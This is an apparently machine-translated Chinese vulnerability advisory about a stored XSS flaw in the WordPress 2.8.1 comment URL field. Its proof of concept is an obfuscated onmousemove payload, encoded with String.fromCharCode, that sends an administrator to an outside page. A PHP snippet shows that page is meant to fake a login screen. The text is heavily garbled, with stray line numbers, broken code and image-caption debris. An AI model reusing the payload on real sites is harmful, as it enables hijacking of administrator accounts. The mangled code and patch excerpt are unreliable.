wordpress281 comments show xss vulnerability-vulnerability warning-the black bar safety net

2009-07-16T00:00:00
ID MYHACK58:62200923911
Type myhack58
Reporter 佚名
Modified 2009-07-16T00:00:00

Description

Ghost boy’blog, XEYE’s blogto assist in testing.

POC: the

  1. In the comment URL field, fill in the
    1. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location. href=String. fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

http://www.inbreak.net/a.php the.

! Size: 32.59 K size: 5 0 0 x 2 8 7 viewed: 0 times click to open a new window to browse the full map

! Size: 26.9 K size: 5 0 0 x 4 1 7 views: 0 clicks to open a new window to browse the full map

For the entire process description:

a. php code:

  1. <? php
    1. $website = $_SERVER['HTTP_REFERER'];
    1. $website=via strtolower($website);
    1. $website=substr($website,7);
    1. $website=substr($website,0,strpos($website,‘/’)); 1 0. 1 1. 1 2. 1 3. //This page is used to impersonate the login page, the harm is huge, The code is inconvenient. 1 4. 1 5. 1 6. 1 7. ?& gt; 1 8. wp. php code
  2. <? php

    1. //Is lv my filter.
    1. ?& gt;

Vulnerability code:

Reception of the comments show, there is also this vulnerability.

Patching way:

    1. 2 0 8 5:$author_url = get_comment_author_url();
        1. 2 1 8 2:case ‘author’:
    1. echo “<td $attributes><strong>”; comment_author(); echo ‘</strong><br />’;
  1. 1 0. if ( ! emptyempty($author_url) ) 1 1. 1 2. echo “<a title=’$author_url’ href=’$author_url’>$author_url_display</a><br />”; 1 3.